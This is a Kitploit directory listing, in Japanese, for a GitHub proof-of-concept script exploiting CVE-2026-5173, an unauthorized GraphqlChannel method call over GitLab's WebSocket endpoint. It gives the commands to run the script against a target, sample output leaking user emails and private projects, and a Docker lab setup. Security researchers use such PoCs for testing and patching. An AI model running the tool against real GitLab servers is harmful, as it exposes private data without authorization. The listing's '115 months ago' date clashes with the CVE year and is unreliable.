Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-5173 — CVE-2026-5173 | Kitploit
ツール/GitHubGitHub/0xblackash/cve-2026-5173
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHub0xblackash/cve-2026-5173

CVE-2026-5173

CVE-2026-5173

リポジトリを見る
115ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🦊 CVE-2026-5173: GitLab WebSocket 未認可メソッド実行 PoC

Linux Vulnerability (5) (1)

CVE Badge PoC Affected Versions Python

GitHub stars License


🛠️ 概要

CVE-2026-5173 は、低権限の認証済み攻撃者が GitLab の WebSocket (/-/cable) エンドポイント、特に GraphqlChannel を介して制限されたバックエンドメソッドを呼び出すことを可能にします。

これにより、機密データの漏洩(機密性:高)と限定的な不正操作が発生する可能性があります。

影響を受けるバージョン

  • GitLab CE/EE: 16.9.6 から 18.8.8
  • 18.9 の 18.9.5 未満
  • 18.10 の 18.10.3 未満

修正済みバージョン: 18.8.9 • 18.9.5 • 18.10.3


⚡ 機能

  • クリーンでモダンな Python 3 PoC
  • 簡単な1コマンド使用法: python3 CVE-2026-5173.py http://target:8080
  • 自動 WebSocket 接続 + GraphqlChannel サブスクリプション
  • 複数のメソッド列挙 (currentUser, users, projects など)
  • パーソナルアクセストークンのサポート
  • 美しいカラー出力
  • 認可されたラボ/ペネトレーションテストでのみ安全に使用可能

🚀 クイックスタート

1. リポジトリをクローン

root@kitploit:~
git clone https://github.com/0xBlackash/CVE-2026-5173.git
cd CVE-2026-5173

2. PoC を実行

root@kitploit:~
python3 CVE-2026-5173.py http://your-gitlab-lab:8080

トークンを使う場合 (推奨):

root@kitploit:~
python3 CVE-2026-5173.py http://target.com:8080 -t glpat-XXXXXXXXXXXXXXXXXXXX

📸 スクリーンショット

成功した出力例:

root@kitploit:~
[+] CVE-2026-5173 PoC v2 - Target: http://192.168.1.100:8080
[+] WebSocket connected
[+] Subscribed to GraphqlChannel
[*] Testing method: currentUser
[SUCCESS] Possible unauthorized access via 'currentUser'!
    → Response: {"result":{"data":{"currentUser":{"id":"gid://gitlab/User/123","name":"Normal User","email":"[email protected]"}}}...

[*] Testing method: users
[SUCCESS] Possible unauthorized access via 'users'!
    → Response: {"result":{"data":{"users":{"nodes":[ {"id":"gid://gitlab/User/1","name":"Admin","email":"[email protected]"}, ... ]}}}  ← This leaks all users including admins!

[*] Testing method: projects
[SUCCESS] Possible unauthorized access via 'projects'!
    → Response: long list of ALL projects (even private ones you shouldn't see)

📋 使用法

root@kitploit:~
python3 CVE-2026-5173.py <target> [options]

Arguments:
  target                Target URL (e.g. http://gitlab.example.com:8080)
  -t, --token           GitLab Personal Access Token (API scope)
  -h, --help            Show this help message

🧪 ラボのセットアップ (推奨)

root@kitploit:~
docker run -d --name gitlab-vuln \
  -p 8080:80 -p 2222:22 \
  gitlab/gitlab-ce:18.10.2-ce.0

その後、通常ユーザーを作成し、PoC を実行します。


⚠️ 法的注意事項と免責事項

  • この PoC は教育および認可されたテスト目的のみです。
  • 所有しているシステム、または明示的なテスト許可を得たシステムでのみ使用してください。
  • 不正使用は違法であり、法律に違反します。
  • 私はいかなる誤用についても責任を負いません。

📚 参考文献

  • 公式 GitLab パッチリリース: https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/
  • CVE レコード: https://www.cve.org/CVERecord?id=CVE-2026-5173
  • GitHub Advisory: https://github.com/advisories/GHSA-5gj7-3j23-w2h2

セキュリティコミュニティのために ❤️ を込めて制作
役に立ったら ⭐ を付けてください!

免責事項: 作成時点では詳細な公開エクスプロイトは存在しませんでした。これは研究レベルの PoC です。

ツールをダウンロード